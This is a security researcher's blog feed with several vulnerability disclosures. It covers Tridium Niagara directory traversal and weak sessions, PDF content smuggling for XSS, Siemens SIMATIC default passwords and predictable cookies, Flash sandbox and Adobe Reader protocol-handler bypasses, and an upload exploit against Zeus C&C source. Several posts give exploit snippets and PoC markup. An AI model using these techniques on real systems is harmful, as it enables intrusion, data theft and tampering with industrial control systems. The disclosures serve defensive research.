Billy (BK) Rios Thoughts on Security in an Uncivilized World… Mon, 26 Nov 2012 12:30:50 +0000 en-US hourly 1 Tridium Niagara – Directory Traversal Mon, 26 Nov 2012 12:30:50 +0000 In July of this year, I wrote about some of the frustrations I encountered when working with Tridium and trying to get them to fix various issues with their Niagara framework. The Niagara framework is the most prevalent Industrial Control System (ICS) in the world; it links together various ICS technologies and protocols. Looking at Eireann Leverett’s research on Internet accessible ICS, we see that Tridium Niagara is the prevalent ICS system available from the Internet. I didn’t talk much about the details of the issues I reported to DHS, but considering the patch has been out for nearly six months, I figure now is a good time.

The initial issue I reported to Tridum was a directory traversal issue that allowed remote, authenticated users to access files outside of the webroot. “Authenticated” includes demo and low privileged accounts. The directory traversal is very simple. Most web application security specialists know the classic “../../” style directory traversal, however Tridium was a bit different. Tridium makes use of “ordinals” to enable various functionalities within Niagara. For example, here is a URL for a Niagara deployment that uses the “station” ordinal:

The Niagara framework supports a large number of ordinals. One of these ordinals is the “file” ordinal, which is used to retrieve files from the Niagara framework server. The “file” ordinal followed by the path and filename to some file located within the webroot of the Niagara framework server. The Tridium Niagara framework isn’t susceptible to “../../” style traversal attacks, instead the Niagara framework uses the “^” character to traverse directories. Knowing this, we can specify a “^” character immediately following the file ordinal to traverse outside of the webroot. There are several files just outside of the webroot, however there is one file that is particularly interesting, a file named “config.bog”. The config.bog file is the configuration file for the entire Tridium Niagara deployment. The config.bog file contains all the configuration settings including username and encrapted (yes, I said encrapted… not encrypted) passwords for all accounts enabled on the system. Knowing this, we have a simple, reliable form of privilege escalation for any Tridium Niagara device. The exploit is very simple:


When you make the request above, you’ll download a compressed file. Unzip the compressed file and you’ll find the clear text config.bog for the Niagara server. Inside the config.bog, you’ll see the entire, detailed configuration for the Tridium device along with the username and passwords (protected with encraption). That’s it, it’s that simple. When I reported this issue to Tridium, I sent them a copy of their config.bog file for their marketing demo deployment.

Let’s ignore the fact that demo, default, and guest accounts are fairly common on these devices. In addition to the directory traversal, I also reported a weak session issue and insecure storage of user credentials issue. The Tridium Niagara framework generates sessionids that have about 9 bits of strength. This makes brute force attacks completely feasible and allows a remote attacker to quickly gain access to an authenticated state. Once authenticated, they are free to utilize the directory traversal to escalate privilege to Administrator. If that weren’t enough, the Tridium Niagara framework also stores a copy of the current username and password (base64’d) in the cookie giving any XSS bug the potential to divulge the clear text username and password.

There is a shining light to this story. When I first reported this issue to Tridium, the initial response was horrid. 6 months after the initial report, Tridium’s leadership attempted to pass these vulnerabilities off as “by-design”. Eventually, the folks at Honeywell (Tridium’s parent company) found about these issues and took over the response process. Three weeks later, they had a patch ready to go. Honeywell made the patch available to me a few days in advance of the release so I could take a look and verify the issues were fixed. They even gave me credentials to the new demo site so I could see the new features and security changes. It was welcoming to see an ICS vendor take such a stance towards security researchers, I hope other ICS vendors take note and follow suit. I’d like to personally thank Kevin Staggs for driving the renewed focus on security for Tridium Niagara, if you’re a Tridum customer, you should thank Kevin too. If you are a Tridium customer, you can learn more about the patch here:


]]> 1
Content Smuggling Thu, 11 Oct 2012 18:00:28 +0000 A few years ago, I discovered a peculiar design decision described in the PDF specification. This design flaw allows for an attacker to conduct XSS attacks against some websites that would not normally have XSS vulnerabilities. I reported this issue to Adobe in late 2009. Apparently, there are some challenging back-compat issues which make changing this design difficult. Given it’s been nearly three years since I first reported the issue to Adobe and a fix from Adobe doesn’t seem likely (Chrome has already fixed their internal PDF reader), I figured I should let web application community know about the exposures. I don’t expect “APT” or other 31337 $country “cyber liberation armies” to use this anytime soon, but it is interesting behavior and I hope web application security folks find it interesting. Hopefully some researcher who’s smarter than me can take this to the next level. Oh, and I apologize for the ugly PoCs in advance!

If we take a look at section 3.4.1, “File Header” of Appendix H in the PDF specification, we see the following:

13. Acrobat viewers require only that the header appear somewhere within
the first 1024 bytes of the file.

Anyone who has read the PDF specification probably knows about this behavior, in fact Julia Wolf mentioned this behavior in her epic OMG WTF PDF talk at CCC in 2010. This peculiar design allows for the creation of a hybrid file that is both some arbitrary file type (such as gif, png, doc…etc) and PDF. We do this by cramming a PDF header after another file header. An example of this is shown in the screenshot below:


Hopefully, by now we’ve already realized that hosting user controlled PDFs and serving those PDFs from a sensitive domain is dangerous from a web security perspective. However, with this quirky file header behavior, we’ll have the ability to smuggle PDFs onto a website that only accepts “benign” file types. As an example, I’ve uploaded such a file to an appspot web application I created. The PoC shows that we can load a single file as both a GIF (or any other file type we want) and a PDF. Adobe PDF reader needs to be set as your default PDF handler for the PoC to work.

The only difference in the two displays in the PoC above is the way we reference the file. In the case of the image, we simply use an IMG tag. When we want to force the browser to hand the file to the default PDF reader, we make use of the OBJECT tag and explicitly specify a content type to force the content to be handled by the default PDF reader. Of course, this technique can be generalized for other plugins.

<img src="" height=10 width=10></img>


<object data="" type="application/pdf" width="500" height="500"></object>

PDFs do not have by-design access to the DOM of the domain from which it is served. How then can we use a PDF to achieve XSS? Here is where the feature rich Adobe PDF Reader comes into play. Once the PDF is loaded, we have a couple different options to achieve XSS. First, we can redirect the PDF to a javascript url. These redirections will navigate the browser (not the PDF document) and results in true browser based XSS on the victim domain. Luckily, Adobe considers redirection from a PDF to javascript URLs a bug and has eliminated the most obvious methods for achieving this. There is however, another method which essentially achieves the same impact. We can use a built in API to make network requests to and from the victim domain. These network requests will carry any cookies associated with the victim domain, giving the attacker access to authenticated resources.

The following link demonstrates how this issue would be used against a website. The domain (the attacker’s domain in this example) loads a smuggled GIF/PDF from (the victim domain in this example). Once the PDF is loaded, we make use of the built in XML APIs to retrieve a file /secret.txt from (the victim domain).

IE users will see a warning in the PDF reader. This is because IE actually downloads the PDF and opens a local copy :) You can verify the IE behavior by browsing to this PoC with Internet Explorer (Adobe PDF Reader must be set as the default reader).

Lastly, you can inject a PDF into a website if you have already XSS. This might be helpful in bypassing XSS filters or application filtering. This is accomplished by injecting a PDF into the vulnerable site using the OBJECT tag.

<object data="http://vulnerable-domain/xss.asp?vulnerable-param=<injected PDF HERE>" type="application/pdf" width="500" height="500"></object>

An example of how this could be done is given below (this PoC best viewed in FireFox with Adobe PDF Reader, but the technique is possible for all browsers).

What’s the impact? Well, I suspect there are plenty of Internet facing web sites that are vulnerable to this bug. Any web application that accepts uploads of “benign” file types and then serves those files back to the user could be affected. This also affects websites which rely on content-type headers to prevent XSS (btw, this strategy doesn’t work). See Phil Purviance’s blog for tips on spotting (and exploiting) websites that use content-type to protect against XSS. This bug can also be used to exploit the applications that use content-disposition headers to prevent XSS bugs. The most common attack surface here will likely be internal content portals. Pretty much every internal content portal used in the enterprise is vulnerable to this issue (think Sharepoint).

You can test for this issue by trying to upload this file to a vulnerable web application. If you see the PDF header in the uploaded file AND the file is served from a sensitive domain (ex. it has auth cookies), then the application is vulnerable.

The proper defense for this is the usage of alternate domains for user supplied content (aka sandboxed domains). Sandboxed domains can be tricky to implement. Some of the most popular web applications on the web already make extensive use of sandbox domains, but the vast majority of web applications do not. Once again, internal content portals are in a hard spot as it’s more difficult to implement a sandboxed domain on an internal network. Sandboxed domains is a subject many “web application security specialists” understand poorly and probably deserves its own blog post. How to properly implementing a sandboxed domain is a great interview question for senior web application security roles because it tests design and implementation skills. It also requires a really solid understanding of browser/plugin same origin policy. I haven’t seen much written about sandboxed domains, but this blog post does a nice job of summing up some of the challenges of content hosting.

Happy hunting!


]]> 1
Tridium – An ICS Learning Moment… Fri, 13 Jul 2012 00:07:25 +0000 We are happy to see Robert O’Harrrow is shining a light on the vulnerabilities associated with Industrial Control Systems (ICS). The ICS software community is light years behind modern software security. Sadly, we can honestly say that the security of iTunes is more robust than most ICS software. Terry and I plan on releasing some technical details about what we’ve found in the near future, but for now we wanted to talk about some of our experiences with this particular issue.

First, ICS-CERT has done a great job tracking this issue. It’s been months since we first reported the issue to ICS-CERT. Following up with an unresponsive vendor is extremely frustrating. It was apparent that ICS-CERT was making every effort to follow-up with Tridium and they kept us well informed throughout the entire process. We especially want to thank those ICS-CERT analysts who kept us apprised of developments despite the lack of response and unwillingness of Tridium to accept responsibility for the issue.

We are disappointed that it took so long for the public to become aware of this issue. According to the Washington Post article, Tridium became aware of this vulnerability “almost a year ago, when a Niagara customer that uses the software to manage Pentagon facilities turned up issues in an audit”. We are disappointed that even after discovering critical, remotely exploitable vulnerabilities in Tridium software… our government chose to purchase and implement the software anyway. We are disappointed that our tax payer money paid for the ignored security audit, paid for the acquisition, and paid for the implementation/deployment of known vulnerable software. We’d like to challenge our nation’s leadership to evaluate the failures in our current processes surrounding the acquisition of software that support Critical Infrastructure and Industrial Control Systems.

At times, we felt like ICS-CERT had their hands tied. We realize when you are working with vulnerabilities that could affect critical infrastructure, a delicate balance between disclosure and timely notification of affected organizations must be maintained. However, when a vendor is unresponsive or refuses to accept responsibility for an issue, ICS-CERT should have the authority to inform those customers who are vulnerable in a timely manner. DHS and ICS-CERT work for us, the American people… they do not work for the PR departments of ICS companies. ICS-CERT should be able to take the appropriate actions to ensure that we’re safe and to ensure ICS customers have the right information to mitigate and control risk. The PR damage done to any individual company should never be part of this equation. If a vendor is unresponsive or unwilling to accept responsibility for a security issue, ICS-CERT should have the option of disclosing issues (45) days after initial notification from external researchers (this is consistent with CERT/CC’s disclosure timelines). Of course, special circumstances require special handling, but we’re sure the folks at ICS-CERT can make those determinations when needed.

Probably the most disappointing part of the whole ordeal is Tridium’s eagerness to blame the customer. We’ve seen this from other ICS vendors as well. It should never be the customer’s responsibility to have to compensate for poor design. Many ICS vendors expect customers to ensure their product is implemented securely, yet provide zero (or extremely vague) guidance on how to do so. In many cases, secure deployment is simply impossible due to the extremely poor security design. Notification, automatic patching, and secure implementation guidelines in the ICS world are light years behind modern software. We don’t understand Tridium’s claims that, “The firm also is doing more to train customers about security” when the root cause of these issues is poor design and coding practices from Tridium itself. Maybe Tridium should invest in training their developers about security first…

If you would like to contact us about our experiences, please email us at: help – at –

Billy Rios @xssniper and Terry McCorkle @0psys

]]> 0
The Siemens SIMATIC Remote, Authentication Bypass (that doesn’t exist) Wed, 21 Dec 2011 01:22:40 +0000 I have been working with ICS-CERT and various vendors over the last year, finding bugs and “responsibly” reporting nearly 1000 bugs… all for free and in my spare time. Overall, its been a great experience. Most of the vendors have been great to work with and ICS-CERT has done a great job managing all the bugs I’ve given them. In May of this year, I reported an authentication bypass for Siemens SIMATIC systems. These systems are used to manage Industrial Control Systems and Critical Infrastructure. I’ve been patiently waiting for a fix for the issue which affects pretty much every Siemens SIMATIC customer. Today, I was forwarded the following from Siemens PR (Alex Machowetz) via a Reuters reporter that made an inquiry about the bugs we reported:

“I contacted our IT Security experts today who know Billy Rios…. They told me that there are no open issues regarding authentication bypass bugs at Siemens.”

For all the other vendors out there, please use this as a lesson on how NOT to treat security researchers who have been freely providing you security advice and have been quietly sitting for half a year on remote authentication bypasses for your products.

Since Siemens has “no open issues regarding authentication bypass bugs”, I guess it’s OK to talk about the issues we reported in May. Either that or Siemens just blatantly lied to the press about the existence of security issues that could be used to damage critical infrastructure…. but Siemens wouldn’t lie… so I guess there is no authentication bypass.

These aren't the Auth Bypasses you're looking for

These aren't the Auth Bypasses you're looking for

First, the default password for Siemens SIMATIC is “100”. There are three different services that are exposed when Siemens SIMATIC is installed; Web, VNC, and Telnet. The default creds for the Web interface is “Administrator:100” and the VNC service only requires the user enter the password of “100” (there is no user name). This is likely the vector pr0f used to gain access to South Houston (but only he can say for sure). All the services maintain their credentials separately, so changing the default password for the web interface doesn’t change the VNC password (and vice versa). I’ve found MANY of these services listening on the Internet… in fact you can find a couple here:

But WAIT, there's MORE!

But WAIT, there's MORE!

But WAIT… there’s MORE! If a user changes their password to a new password that includes a special character, the password may automatically be reset to “100”. Yes, you read that correctly… if a user has any special characters in their password, it may be reset to “100”. You can read about these awesome design decisions (and many others) in the Siemens user manuals.

But WAIT… there’s MORE! So I took a look at what happens when an Administrator logs into the Web HMI. Upon a successful login, the web application returns a session cookie that looks something like this:


Looks pretty secure… right? Well, I harvested sessions from repeated, successful logins and this is what I saw:


Not so random huh…. If you decode these values, you’ll see something like this:

<STATIC VALUE>*administrator*11377468*17*
<STATIC VALUE>*administrator*11393468*18*
<STATIC VALUE>*administrator*11409484*19*
<STATIC VALUE>*administrator*11425484*20*
<STATIC VALUE>*administrator*11441500*21*
<STATIC VALUE>*administrator*11457500*22*
<STATIC VALUE>*administrator*11473515*23*
<STATIC VALUE>*administrator*11489515*24*

Totally predictable. For those non-techies reading this… what can someone do with this non-existent bug? They can use this to gain remote access to a SIMATIC HMI which runs various control systems and critical infrastructure around the world… aka they can take over a control system without knowing the username or password. No need to worry though, as there are “no open issues regarding authentication bypass bugs at Siemens.”

Next time, Siemens should think twice before lying to the press about security bugs that could affect the critical infrastructure….to everyone else, Merry Christmas


]]> 36
Turning the Tables – Part II Fri, 10 Jun 2011 22:44:06 +0000 I’m posting some of the research I’ve been working on over the last few months. I planned on submitting some of this research to the Blackhat/DEFCON CFP, but it looks like I’ll be tied up for most of the summer and I won’t be able to make it out to Vegas for BH or DEFCON this year (pour some out and “make it rain” for me). The gist of the research is this: I’ve collected of number of malware C&C software packages. I set up these C&Cs in a virtual network and audited the applications and source code (when available) for bugs. The results were surprising; most of the C&C software audited has pretty crappy security.

This week’s sample is an auth bypass and SQL injection on a BlackEnergy C&C page. The first of the samples can be found here:

I’ll post more samples in the coming weeks.

Attacking malware C&C is an interesting proposition. Exploiting a single host can result in the transfer of hundreds or even thousands of hosts from one individual to another. I’m not the first to note that malware and C&C software is evolving. Gone are the days of simple IRC bots receiving clear text commands from an IRC server. Today’s C&C’s are full fledged, feature rich applications with much complexity. Complexity is the enemy of security, even malware authors cannot escape this. There is no magic bullet, even malware authors face the difficulties of writing secure code. This is especially so if their customers are paying money for C&C software and demand newer features and robust interfaces. Today’s malware landscape looks much like a typical software enterprise with paying customers, regularly scheduled feature updates, marketing, and a sprinkling of PR. Who knows, maybe in the near future these malware enterprises will have dedicated, on-call security engineering teams and a formal SDL process :)

]]> 0
Bypassing Flash’s local-with-filesystem Sandbox Tue, 04 Jan 2011 11:00:19 +0000 A few weeks ago, I posted a description of a set of bugs that could be chained together to do “bad things”.  In the PoC I provided, a SWF file reads an arbitrary file from the victim’s local file system and passes the stolen content to an attacker’s server.

One of the readers (PZ) had a question about the SWFs local-with-filesystem sandbox, which should prevent SWFs loaded from the local file system from passing data to remote systems.  Looking at the documentation related to the sandbox, we see the following:

Local file describes any file that is referenced by using the file: protocol or a Universal Naming Convention (UNC) path. Local SWF files are placed into one of four local sandboxes:

The local-with-filesystem sandbox—For security purposes, Flash Player places all local SWF files and assets in the local-with-file-system sandbox, by default. From this sandbox, SWF files can read local files (by using the URLLoader class, for example), but they cannot communicate with the network in any way. This assures the user that local data cannot be leaked out to the network or otherwise inappropriately shared.

First, I think the documentation here is a bit too generous.  SWFs loaded from the local file system do face some restrictions.  The most relevant restrictions are probably:

  1. The SWF cannot make a call to JavaScript (or vbscript), either through URL or ExternalInterface
  2. The SWF cannot call a HTTP or HTTPS request.
  3. Querystring parameters (ex. Blah.php?querystring=qs-value) are stripped and will not be passed (even for requests to local files)

Unfortunately, these restrictions are not the same as, “cannot communicate with the network in any way” which is what is stated in the documentation.  The simplest way to bypass the local-with-filesystem sandbox is to simply use a file:// request to a remote server.  For example, after loading the content from the local file system an attacker can simply pass the contents to the attacker server via getURL() and a url like:  file://\\\stolen-data-here\

Fortunately, it seems you can only pass IPs and hostnames for system on the local network (RFC 1918 addresses).  If an attacker wants to send data to a remote server on the Internet we’ll have to resort to a couple other tricks.  A while back, I put up a post on the dangers of blacklisting protocol handlers.  It’s basically impossible to create a list of “bad” protocol handlers in siutation like this.  In the case of the local-with-filesystem sandbox, Adobe has decided to prevent network access through the use of protocol handler blacklists.  If we can find a protocol handler that hasn’t been blacklisted by Adobe and allows for network communication, we win. 

There are a large number of protocol handlers that meet the criteria outlined in the previous sentence, but we’ll use the mhtml protocol handler as an example.  The mhtml protocol handler is available on modern Windows systems, can be used without any prompts, and is not blacklisted by Flash.  Using the mhtml protocol handler, it’s easy to bypass the Flash sandbox:

getURL(‘mhtml:‘, ”);

Some other benefits for using the mhtml protocol handler are:

  1. The request goes over http/https and port 80/443 so it will get past most egress filtering
  2. If the request results in a 404, it will silently fail.  The data will still be transmitted to the attackers server, but the victim will never see an indication of the transfer
  3. The protocol handler is available by default on Win7 and will launch with no protocol handler warning

There you go, an easy way to bypass Flash’s local-with-file system sandbox.  Two lessons here.  One, running un-trusted code (whether it’s an executable, javascript, or even a swf) is dangerous.  Two, protocol handler blacklists are bad.  Hope this helps PZ!

]]> 30
Expanding the Attack Surface Wed, 22 Dec 2010 20:11:55 +0000 Imagine there is an un-patched Internet Explorer vuln in the wild.  While the vendor scrambles to dev/test/QA and prime the release for hundreds of millions of users (I’ve been there… it takes time), some organizations may choose to adjust their defensive posture by suggesting things like, “Use an alternate browser until a patch is made available”.

So, your users happily use FireFox for browsing the Internet, thinking they are safe from any IE 0dayz… after all IE vulnerabilities only affect IE right?  Unfortunately, the situation isn’t that simple.  In some cases, it is possible to control seemingly unrelated applications on the user’s machine through the browser.  As an example (I hesitate to call this a bug, although I did report the behavior to various vendors) we can use various browser plugins to jump from FireFox to Internet Explorer and have Internet Explorer open an arbitrary webpage.

  1. Requirements:  Firefox, Internet Explorer, and Adobe PDF Reader (v9 or X)
  2. Set the default browser to Internet Explorer (common in many enterprises)
  3. Open Firefox and browse to the following PDF in Firefox:

Firefox will call Adobe Reader to render the PDF, Adobe Reader will then call the default browser and pass it a URL, the default browser (IE) will render the webpage passed by the PDF.

The example I provide simply jumps from Firefox to IE and loads, however I’m free to load any webpage in IE.  To be fair, we can substitute Firefox for Safari or Opera and it will still work.

Achieving this is simple.  We use a built-in Adobe Reader API called app.launchURL().  Looking at the documentation for the launchURL() API, we see that launchURL() takes two parameters: cURL (required) and bNewFrame (optional).  cURL is a string that specifies the URL to be launched and bNewFrame provides an indication as to whether cURL should be launched in a “new window of the browser application”.  In this case, “new window of the browser application” really means the default browser.

A simple one liner in Adobe Reader JavaScript gets it done:


Happy hunting…

]]> 2
Will it Blend? Fri, 17 Dec 2010 10:26:10 +0000 I had the honor of presenting at RuxCon and BayThreat this year.  Both were great conferences with great people.  I’m always humbled when I learn of what others are doing in the security community and even more humbled when asked to present.  I gave a presentation called Will It Blend.  The title of the talk is based on a series of videos from Blendtec (I could watch these videos all day).  The content of the talk however is about “blended threats”.  During the talk I presented a set of bugs I discovered in various browser plug-ins.  Independently, these bugs are pretty lame.  However, if we chain the bugs together, we get something that’s actually pretty interesting.  If you’re interested in taking a look at the slides, you can find them here (PPTPLEX format) or on the RuxCon/Baythreat websites.  The vuln chaining is a little difficult to visualize by looking at the slides, so at the end of my talk I gave a live demo of the bugs being chained together.  For those who were unable to attend my talk live, I’ve created a video to help understand how the exploit would be pulled off (  It will help to go over the slides first, then watch the video.

Most of the relevant code is available in the slide deck (its really simple).  There are around 5 different bugs in play here, involving a variety of vendors.  All the vendors involved have been contacted.  The oldest bug here is over a year old, the youngest is about five months old.  Kudos to Adobe.  Adobe X has changed its caching behavior, so this specific attack cannot be used against Adobe X users. 

I’m not sure where the blame lies for fixing these issues.  On one hand, if a single vendor addresses their portion of the attack, the entire chain of vulnerabilities is broken.  On the other hand, if only one vendor addresses their issue, all we have to do is find some other software/plugin that buys us the same capability and its game on again.

I hope someone finds the presentation useful.  Happy hunting.

]]> 4
PDF RCE et al. (CVE-2010-3625, CVE-2010-0191, CVE-2010-0045) Mon, 18 Oct 2010 18:00:25 +0000 A few weeks ago, Adobe released an advisory for a ton of Acrobat Reader bugs.  Buried in the long list of Acrobat Reader bugs was a patch for a vulnerability I reported to Adobe.  Taking a look at the entry in the advisory, we see the following description:


This update resolves a prefix protocol handler vulnerability that could lead to code execution

What’s interesting is many months ago (in April 2010), Adobe released a similar patch for a different bug I had reported to them.  The description from April’s advisory is as follows:


This update resolves a prefix protocol handler vulnerability that could lead to code execution

Going back even further, there is an Apple advisory that has a bug with a description similar to the Adobe advisories:


Description: An issue in Safari’s handling of external URL schemes may cause a local file to be opened in response to a URL encountered on a web page. Visiting a maliciously crafted website may lead to arbitrary code execution.

I’ll walk you through the latest PDF bug, but the symptoms for all the bugs are very similar.  As you know, PDF Reader supports the use of JavaScript.  One of the JavaScript APIs supported by Acobat Reader (>7.0) is app.launchURL().  app.launchURL() takes two parameters, the URL to be opened and a flag that specifies whether the URL should be opened in a new window.  Typical usage of app.launchURL() looks something like this:

app.lauchURL(“” , false);

Simple enough.  Naturally, when a string that looks like URI is encountered one of the first things that’s attempted is to point the URI value to a file:// location and observe whether the local file is opened.  In this case, access to file:// is blocked by Adobe reader.  Next up are arbitrary protocol handlers.  Tests for mailto://, foo://, bar:// all work, however JavaScript:// seems to be blocked.  This feels like a protocol handler blacklist.  I think there was a SouthPark episode about using blacklists last year…

There is a simple way to bypass most protocol handler blacklists.  This bypass was the key to CVE-2010-3625, CVE-2010-0191, and CVE-2010-0045.  The trick is to simply append a “URL:” prefix protocol handler to your URI.  You can test this by opening Internet Explorer (IE8 on Win7) and typing “url:javascript:alert(1)”.  I must give credz where credz are due.  I first learned of this prefix protocol handler when looking at the source code for HTMLer (which is a port of MangleMe).

With the prefix protocol handler in hand, we’re all set to bypass the protocol handler blacklist:

app.launchURL(“url:file://c:/windows/system32/calc.exe”, true);

There is some weird shell behavior here (which I won’t get into), but the key pieces are (as far as this bug is concerned):  the url: prefix protocol handler and setting the “New Window” flag to true.  A link to a simple PoC is provided below.  This bug worked on Win7 with no prompts.  For some users, this bug will not work if IE is already running (must be launched from a browser other than IE).  For users without Adobe’s April patch, this bug should work on all browsers in most configurations.

There you go, a simple yet effective way to bypass a protocol handler blacklist.  I hope that knowledge of this prefix protocol handler provides that missing piece you needed.  Happy hunting.

]]> 2
Turning the Tables – Part I Mon, 27 Sep 2010 11:00:55 +0000 Boom… I’ve just taken over a Zeus C&C.  I fire up a second, clean VM just to verify… yup it works.  Ok, now what?

A while back, I came across a kit for setting up a Zeus botnet.  It was an interesting package.  Looking at the C&C, bot builder, the actual bot, and user manual was pretty cool (yes, it comes with a user manual).  You have to admire the some of the tricks used by the bot, these guys are clever.  I set up a mini-botnet on a testing network and began to examine how the botnet worked.  Eventually, I came across some bugs (even a blind squirrel finds a nut every once in a while).  There are some fascinating things to consider when finding bugs in software that is used primarily by criminals, but I won’t bore you with that now.  Instead I’d like to share with you some of the more interesting parts of my research.

Before I proceed, there are a few things I’d like to state:

  1. This research was done on my own time on my own equipment.  The thoughts on my blog are my own.
  2. Disclosure of this issue is a bit tricky.  I’ll cover some of the issues I came across in a future post.
  3. I’m releasing the details of my work because I felt it was important for the public to have this knowledge to better defend their networks.
  4. All the work presented here is for academic and research purposes only.

In the spirit of responsible disclosure I contacted and informed them that I may have discovered a security issue with their C&C server software.  The team informed me that they were a cloud service provider and didn’t have C&C software. then proceeded to spam me with advertisements for their latest products.  I then contacted but received no response. then proceeded to spam me with Viagra ads and executables for me to download.  With no other alternative and an email inbox full of spam, I have no choice but to provide full disclosure of the vulnerability to the public.

Taking a look at the documentation that accompanies the Zeus package, I see change log indicates that I’m working with a recent version of Zeus (likely released earlier this year).

Examining the source code from the C&C confirms that I’m working with version, which was released on January 15th of this year.

I haven’t tested this exploit against newer versions of the C&C, but this post should provide everything you need to check yourself.  If you do happen to have a newer version of the C&C code (or kits from other botnets), please contact me (xssniper  -at- gmail) I’d love to have a look.  I looked on the Internetz to see if someone else had discovered this, but I found nothing.  If this bug was previously disclosed and I failed to credit you, please let me know (I don’t follow the bot scene very closely).

The C&C software has a PHP based web application that provides a control panel for botmasters and also serves as a gateway for bot communication.  There are several websites that have described the C&C so I won’t spend much time on that here, but I do feel it’s important to touch on a few things.  When the C&C web application is installed, very little attack surface is exposed to unauthenticated users.  The two most interesting pages available to unauthenticated users are the login page and the gateway.  By default, the login page is located at /cp.php.  By default, the gateway is located at /gate.php.  Some botmasters rename the gate.php file, however if you’ve managed to capture a live Zeus bot it will phone home to a php file.  The php file that the bot phones home to is the gateway (gate.php).  For clarity, let’s assume the gateway is at /gate.php (the default).  The gateway will only respond to requests from bots.  For example, if you point your browser to /gate.php, you’ll get a blank page back:

Luckily, we have both bot samples and the source for the C&C, allowing us to reverse the protocol needed for communication to the gateway.  Let’s walk through a couple key pieces of the gate.php source.  First, the gateway requires a POST request.

if(@$_SERVER['REQUEST_METHOD'] !== ‘POST’)die();



If the gateway receives a POST request, it grabs the POST body, performs some basic validation, and then decrypts the data using the RC4 algorithm.

$data      = @file_get_contents(‘php://input’);

$data_size = @strlen($data);

if($data_size < HEADER_SIZE + ITEM_HEADER_SIZE)die();

$data = RC4($data, BOTNET_CRYPTKEY);

This is not a typical POST request with POST parameters in the body.  Instead, this POST request contains a binary blob as its POST body (there are no POST parameter names).  The last line in the code snippet provided above mentions RC4 and a PHP constant named BOTNET_CRYPTKEY.  In case you’re wondering, the RC4 key (BOTNET_CRYPTKEY) is set by the botmaster when setting up the C&C and is stored server side (in the /system/config.php file).  As RC4 is a symmetric algorithm, the bot must also have a representation of the key.  The key is embedded into the bot (supplied via configuration file).  So once you have captured a live bot, you’ll be able to extract the RC4 key.  The key can be extracted from memory or if you are able to decrypt the config.bin file, you’ll see the key passed as part of the configuration for the bot.  If you’re interested in doing this, check out  Worst case, you can try brute forcing the key.

Once the data is decrypted, the gateway does a quick sanity check.

if(strcmp(md5(substr($data, HEADER_SIZE), true), substr($data, HEADER_MD5, 16)) !== 0)die();

and proceeds to unpack the data if the sanity check turns out ok

$list = array();

for($i = HEADER_SIZE; $i < $data_size;)


$k = @unpack(‘L4′, @substr($data, $i, ITEM_HEADER_SIZE));

$list[$k[1]] = @substr($data, $i + ITEM_HEADER_SIZE, $k[3]);

$i += (ITEM_HEADER_SIZE + $k[3]);



Once the data is unpacked, we will have an array ($list[]) populated with various configuration and log data being passed from the bot to the C&C.  Using what we’ve discovered thus far, we can create a fake bot that is capable of communicating with the C&C.  Depending on the values held in the $list array, the gateway executes various functions.  One of the functions I found interesting was this:

else if(!empty($list[SBCID_BOTLOG]) && !empty($list[SBCID_BOTLOG_TYPE]))


$type = ToInt($list[SBCID_BOTLOG_TYPE]);

if($type == BLT_FILE)


//Расширения, которые представляют возможность удаленного запуска.

$bad_exts = array(‘.php3′, ‘.php4′, ‘.php5′, ‘.php’, ‘.asp’, ‘.aspx’, ‘.exe’, ‘.pl’, ‘.cgi’, ‘.cmd’, ‘.bat’, ‘.phtml’);

$fd_hash  = 0;

$fd_size  = strlen($list[SBCID_BOTLOG]);

//Формируем имя файла.

if(IsHackNameForPath($bot_id) || IsHackNameForPath($botnet))die();

$file_root = REPORTS_PATH.’/files/’.urlencode($botnet).’/’.urlencode($bot_id);

$file_path = $file_root;

$last_name = ”;

$l = explode(‘/’, (isset($list[SBCID_PATH_DEST]) && strlen($list[SBCID_PATH_DEST]) > 0 ? str_replace(‘\\’, ‘/’, $list[SBCID_PATH_DEST]) : ‘unknown’));

foreach($l as &$k)



$file_path .= ‘/’.($last_name = urlencode($k));


if(strlen($last_name) === 0)$file_path .= ‘/unknown.dat’;


//Проверяем расширении, и указываем маску файла.

if(($ext = strrchr($last_name, ‘.’)) === false || in_array(strtolower($ext), $bad_exts) !== false)$file_path .= ‘.dat’;

$ext_pos = strrpos($file_path, ‘.’);

//FIXME: Если имя слишком большое.

if(strlen($file_path) > 180)$file_path = $file_root.’/longname.dat’;

//Добавляем файл.

for($i = 0; $i < 9999; $i++)


if($i == 0)$f = $file_path;

else $f = substr_replace($file_path, ‘(‘.$i.’).’, $ext_pos, 1);



if($fd_size == filesize($f))


if($fd_hash === 0)$fd_hash = md5($list[SBCID_BOTLOG], true);

if(strcmp(md5_file($f, true), $fd_hash) === 0)break;





if(!CreateDir(dirname($file_path)) || !($h = fopen($f, ‘wb’)))die();

flock($h, LOCK_EX);

fwrite($h, $list[SBCID_BOTLOG]);

flock($h, LOCK_UN);






A quick look at the function above shows that if $list[SBCID_BOTLOG] and $list[SBCID_BOTLOG_TYPE] are set to the correct values, we can trick the C&C into thinking we have a bot that needs to upload a logfile.  Before the C&C accepts our supplied logfile, it first attempts some validation by checking to see if the file extension we’re providing is in a blacklist of “bad extensions” and whether the filepath supplied is “IsHackNameForPath” (a custom validation routine written by the C&C author).

$bad_exts = array(‘.php3′, ‘.php4′, ‘.php5′, ‘.php’, ‘.asp’, ‘.aspx’, ‘.exe’, ‘.pl’, ‘.cgi’, ‘.cmd’, ‘.bat’, ‘.phtml’);


if(($ext = strrchr($last_name, ‘.’)) === false || in_array(strtolower($ext), $bad_exts) !== false)$file_path .= ‘.dat’;


//Формируем имя файла.
if(IsHackNameForPath($bot_id) || IsHackNameForPath($botnet))die();

We know the web server supports PHP because the C&C web management console is written in PHP.  If we can pretend like we’re a bot, convince the C&C that we have a “BOTLOG” that needs to be uploaded, and instead of uploading a “BOTLOG” we upload a PHP file with our PHP content, we could have arbitrary code execution on the C&C.  It seems the C&C code protects against this attack… or does it?  Unfortunately for the botmaster, the PHP interpreter is very liberal on extensions.  Some examples of the quirky extension madness associated with PHP can be found on slide 23 in this presentation (given by Kuza55 at CCC 2007).  In this case, I want to upload a PHP file to both IIS and Apache (the supported platforms for the C&C) so I use the trailing dot trick.  All I have to do is append a trailing period to the end of the .php extension (.php.), and I can bypass the extension check yet have the file contents run by the PHP interpreter.  Once the extension check is bypassed, the value I supplied for $list[SBCID_BOTLOG] is written as content to the file I specified on the webserver.  Now I just have to guess where my PHP file was written.  This line of PHP in the gateway source gives us a clue.

$file_root = REPORTS_PATH.’/files/’.urlencode($botnet).’/’.urlencode($bot_id);

The default location for the BOT LOG is: C&C-webroot\_reports\files\<Name of the botnet>\<Bot ID>\

